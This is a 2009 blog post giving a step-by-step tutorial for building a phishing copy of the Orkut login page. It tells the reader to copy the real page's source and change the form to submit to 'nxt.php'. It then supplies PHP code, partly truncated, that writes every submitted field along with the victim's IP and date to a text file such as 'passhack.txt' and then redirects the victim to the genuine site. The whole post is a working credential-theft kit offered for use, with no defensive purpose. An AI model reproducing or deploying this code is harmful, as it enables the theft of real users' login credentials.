Tuesday, October 13, 2009

orkut make any fake page

1. For this tut, we will use orkut.com as our page that we would like to make a phisher of.
.
.
.
2. Go to http://orkut.com
.
.
.
3. We will now begin to make our phisher. Start by right clicking on the page and click view source.
.
.
.
4. Select all and paste into a notepad document.
.
.
.
5. You should see a bunch of random html coding, but we are only interested in two words: method and action.
.
.
.
6. Do a search in the document for the word "method" (without quotes).
.
.
.
7. Your result should be something like : method="post"
.
.
.
8. Change the word post to the word get.
.
.
.
9. Now do a search for the word "action" (without quotes). action is usually very close to method so you may not even have to do a search for it.
.
.
.
10. You should see something like this: action="https://www.google.com/accounts/ServiceLoginAuth?service=orkut"
.
.
.
11. Where the url in between the quotes is, replace the text with next.php so the new part says: action="nxt.php"
.
.
.
12. Save this file as index.html and create a new document on notepad.

13. In the new document, we will be making the nxt.php page, or the page that they are directed to after you have gotten their log-in information.
.
.
.
14. Copy and paste this code into the notepad document:
Code:
Put your REDIRECT URL Here");
$handle = fopen("passhack.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>
.
.
.
15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My nxt.php file looks like this:
.
.
.
Code:
http://www.orkut.co.in/Main#Home.aspx");
$handle = fopen("passez.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");
fwrite($handle, "\r\n");
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>
.
.
.
16. Save this file as nxt.php and open up a new notepad document.
.
.
.
Files:
1: index.html
2: nxt.php
3: passhack.txt
4: google logo ]https://www.google.com/accounts/google_transparent.gif[ 
Posted by kolli at 12:52 PM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)